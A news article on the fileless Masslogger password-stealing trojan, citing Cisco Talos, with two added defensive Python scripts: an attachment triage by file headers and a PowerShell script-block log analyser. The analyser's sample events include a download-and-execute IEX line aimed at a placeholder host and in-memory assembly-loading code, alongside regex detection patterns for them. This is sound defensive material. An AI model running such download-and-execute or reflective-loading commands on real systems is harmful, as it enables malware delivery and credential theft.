This 'Masslogger' Trojan Is A Fileless Windows Malware That Hunts Passwords

Masslogger

For most online accounts, the only thing that makes someone an authorized user is a correct username and password combination.

While many methods have been created with the goal of "replacing" passwords, people still cannot live without them. From signing in to their accounts onward, the username and password combination is still the most popular method for most people.

Without a doubt, that will remain a fact for the foreseeable future.

Knowing that, and knowing the sensitive information that can sit behind a username and password combination, hackers use the tools at their disposal to get in.

One of the most popular ways is to use malware capable of logging keystrokes.

Known as "keyloggers", such programs covertly record whatever the target types on the keyboard.

This time, a trojan called 'Masslogger' is hunting passwords by lurking inside email attachments, while never writing its payload to its victims' disks.

Masslogger is written in .NET and runs on Microsoft Windows.

Once running, it tries to steal usernames and passwords from Microsoft Outlook, the Thunderbird email client, NordVPN, Discord and other email and chat applications.

It can even steal user credentials from password managers built into Google Chrome, Mozilla Firefox, Microsoft Edge and some other browsers.

The malware campaign first discovered and detailed by Cisco Talos researcher Vanja Svajcer in a blog post, primarily targets business accounts.

To avoid detection and removal, the Masslogger payload exists only in its victims' memory.

In other words, Masslogger is fileless: the credential-stealing component itself is never written to the victim's hard drive.

The only traces Masslogger leaves on disk are the original email attachment and the help file it carries, which look harmless until they are opened.

This particular malware works by performing a simple task in an indirect and overly complicated way.

Figure: The HTML page that is displayed when the email attachment is opened. (Credit: Cisco Talos)

To appeal to its victim, the attachment filename is chosen according to the email subject, possibly with random strings prepended. The attachment is a RAR archive, but it carries a non-default RAR filename extension so that simple blockers which match only on the default .rar extension let it through; RAR unpackers still recognise and open it.

First, the compressed email attachment that the victim opens contains a compiled HTML help (.chm) file, which in turn holds an HTML page with obfuscated JavaScript.
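The extension trick above only works against a gateway that decides by filename. The following Python script, an added example and not Cisco Talos' or the malware author's code, compares that naive verdict with one based on the attachment's leading bytes, so a RAR archive or a compiled HTML help file is recognised whatever it is called. The sample attachments, the signature table and the ".r00" name (a multi-volume RAR part extension, used here as one plausible non-.rar name) are constructed for the example; the magic bytes themselves are the standard file headers.

```python
import re

# Signature table for the container formats that matter in this campaign
# (a RAR archive carrying a compiled HTML help file). Standard file headers.
MAGIC = [
    (b"Rar!\x1a\x07\x01\x00", "rar"),  # RAR 5.x archive
    (b"Rar!\x1a\x07\x00", "rar"),      # RAR 1.5 - 4.x archive
    (b"ITSF", "chm"),                  # Compiled HTML Help (.chm)
    (b"PK\x03\x04", "zip"),            # ZIP (also docx/xlsx/pptx containers)
    (b"%PDF", "pdf"),
]

# What a naive gateway rule keys on: the filename extension only.
NAIVE_BLOCKLIST = {"rar", "chm"}

# Extensions that are legitimate for each sniffed content type (assumed policy).
EXPECTED_EXT = {
    "rar": {"rar"},
    "chm": {"chm"},
    "zip": {"zip", "docx", "xlsx", "pptx"},
    "pdf": {"pdf"},
}

# Content types refused regardless of the name on the attachment.
CONTENT_BLOCKLIST = {"rar", "chm"}


def sniff(data: bytes) -> str:
    """Classify an attachment by its leading bytes, not by its name."""
    for signature, kind in MAGIC:
        if data.startswith(signature):
            return kind
    return "unknown"


def declared_extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def triage(filename: str, data: bytes) -> dict:
    """Return the extension-only verdict next to a content-based one.

    The content verdict blocks archives and CHM files by header, blocks any
    attachment whose extension contradicts its header, and treats multi-volume
    RAR part names (.r00, .r01, ...) with unrecognised content as suspect.
    """
    ext = declared_extension(filename)
    kind = sniff(data)
    naive = "block" if ext in NAIVE_BLOCKLIST else "allow"

    if kind in CONTENT_BLOCKLIST:
        content, reason = "block", f"content is {kind} regardless of .{ext}"
    elif kind != "unknown" and ext not in EXPECTED_EXT[kind]:
        content, reason = "block", f"extension .{ext} does not match {kind} content"
    elif re.fullmatch(r"r\d\d", ext):
        content, reason = "block", "multi-volume RAR part extension"
    else:
        content, reason = "allow", "no indicator"

    return {"ext": ext, "type": kind, "naive": naive, "content": content, "reason": reason}


# Constructed sample attachments (header bytes plus zero filler); none are real samples.
SAMPLES = {
    "Customer service 4a9f.r00": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 64,  # RAR5 under a non-.rar name
    "help.chm": b"ITSF\x03\x00\x00\x00" + b"\x00" * 64,                  # CHM, named honestly
    "statement.pdf": b"%PDF-1.7\n" + b"\x00" * 64,                        # benign PDF
    "invoice.pdf": b"PK\x03\x04" + b"\x00" * 64,                          # ZIP wearing a .pdf name
}


def triage_all(samples=SAMPLES) -> dict:
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, result in triage_all().items():
        print(f"{name:28s} naive={result['naive']:5s} content={result['content']:5s} {result['reason']}")
```

The renamed RAR sample passes the extension check and fails the content check, which is the gap the campaign relies on; the ZIP named `.pdf` shows the same mismatch logic catching a different disguise. A real gateway would go one step further and unpack the archive to sniff the members, since the `.chm` inside is what actually runs.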

When that file is opened, a simple HTML page shows up containing the text "Customer service, Please Wait…"

At the same time, the embedded JavaScript instantiates an ActiveX object that runs obfuscated PowerShell code. This is the downloader stage: it makes the initial connection to the download server, usually a compromised legitimate host, which serves the next stage of the infection.

The PowerShell loader then decodes a .NET DLL into a byte array; this DLL is the Masslogger loader.

Once the DLL is loaded as a .NET assembly, the loader injects the final payload into its process space and launches the trojan without ever writing it to disk.

According to Svajcer, this malware is stored in memory as a buffer compressed with gzip.

To avoid this fileless keylogger, people must use antivirus software and be very careful with unsolicited email attachments, even from people they know. Before opening any attachment, they should save it first and scan it with an antivirus.

Another way to limit the damage is to use a third-party password manager instead of saving passwords inside the browser, since the browsers' built-in stores are among the targets.

Figure: Masslogger campaign modules. (Credit: Cisco Talos)

According to Svajcer, this "interesting campaign" affects Windows systems, with targets that include people in Turkey, Latvia and Italy.

Similar campaigns by the same actor also targeted people in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain in September, October and November 2020.

Masslogger campaigns have been documented before. In this case, however, Cisco Talos found a campaign that differs in using the compiled HTML file format to start the infection chain.

"This file format is typically used for Windows Help files, but it can also contain active script components, in this case JavaScript, which launches the malware's processes," Svajcer explained.

"The observed campaign is almost entirely executed and present only in memory, which emphasizes the importance of conducting regular and background memory scans. The only component present on disk is the attachment and the compiled HTML help file."

"Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format."
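Script block logging is what makes the advice above work: once `EnableScriptBlockLogging` is set to 1 under `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging` (and `EnableModuleLogging` under the sibling `ModuleLogging` key), PowerShell writes each executed script block to the `Microsoft-Windows-PowerShell/Operational` log as event 4104, in its deobfuscated form, with long blocks split across several 4104 events that share a `ScriptBlockId`. The Python script below is an added example, not Cisco Talos' or the project's code, that reassembles such events and flags the loader behaviour described in this article: base64 decoding, in-memory gzip decompression, reflective assembly loading, and a download-and-evaluate stage. The events, their `ScriptBlockId` values and the `example.invalid` URL are constructed for the example; the indicator patterns and thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Indicator patterns matched against deobfuscated 4104 script-block text.
# Constructed for this example; tune them to your environment.
INDICATORS = {
    "base64_decode":   re.compile(r"FromBase64String", re.I),
    "gzip_decompress": re.compile(r"GZipStream|CompressionMode\]::Decompress", re.I),
    "reflective_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
    "downloader":      re.compile(r"Net\.WebClient|Download(String|Data|File)|Invoke-WebRequest|\biwr\b", re.I),
    "runtime_eval":    re.compile(r"Invoke-Expression|\biex\b", re.I),
}

# A reflective assembly load alone is worth an alert; other indicators need company.
HIGH = {"reflective_load"}


def reassemble(events):
    """Join multi-part 4104 events by ScriptBlockId, in MessageNumber order.

    Matching each fragment on its own would miss a loader whose base64 decode
    and Assembly::Load call land in different parts of one long block.
    """
    parts = defaultdict(list)
    for e in events:
        if e["EventID"] != 4104:          # 4103 module-logging events carry no script text
            continue
        parts[e["ScriptBlockId"]].append((e["MessageNumber"], e["ScriptBlockText"]))
    return {sbid: "".join(text for _, text in sorted(p)) for sbid, p in parts.items()}


def analyse(events):
    """Return one finding per script block that meets the alert threshold."""
    findings = []
    for sbid, text in reassemble(events).items():
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if HIGH & set(hits) or len(hits) >= 2:
            findings.append({"ScriptBlockId": sbid, "indicators": hits})
    return findings


# Constructed 4104/4103 events in the shape of the log's EventData fields.
# The script text is illustrative, not a captured sample.
SAMPLE_EVENTS = [
    # Loader-like block split across two 4104 events, logged out of order
    {"EventID": 4104, "ScriptBlockId": "1c0a-loader", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "$gz = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)\n"
                        "$asm = [System.Reflection.Assembly]::Load($dll)\n"},
    {"EventID": 4104, "ScriptBlockId": "1c0a-loader", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$dll = [Convert]::FromBase64String($blob)\n$ms = New-Object IO.MemoryStream(,$dll)\n"},
    # Downloader stage fetching and evaluating the next stage
    {"EventID": 4104, "ScriptBlockId": "7f3e-download", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/next')"},
    # Benign administrative block
    {"EventID": 4104, "ScriptBlockId": "9b21-admin", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object Length"},
    # Module-logging event, ignored by the script-block analysis
    {"EventID": 4103, "ScriptBlockId": None, "MessageNumber": 1, "MessageTotal": 1, "ScriptBlockText": ""},
]


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding["ScriptBlockId"], ", ".join(finding["indicators"]))
```

Because the log records the script block after PowerShell has parsed it, string concatenation and other obfuscation applied to the downloaded stage do not hide these tokens; the same regexes run against an obfuscated file on disk would miss them. Feed the script records exported from the Operational log (for example via `Get-WinEvent` with `-FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}`) in the same field shape.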

Further reading: The 'Invisible Malware', And What You Can Do To Stop Them

Published: 
17/02/2021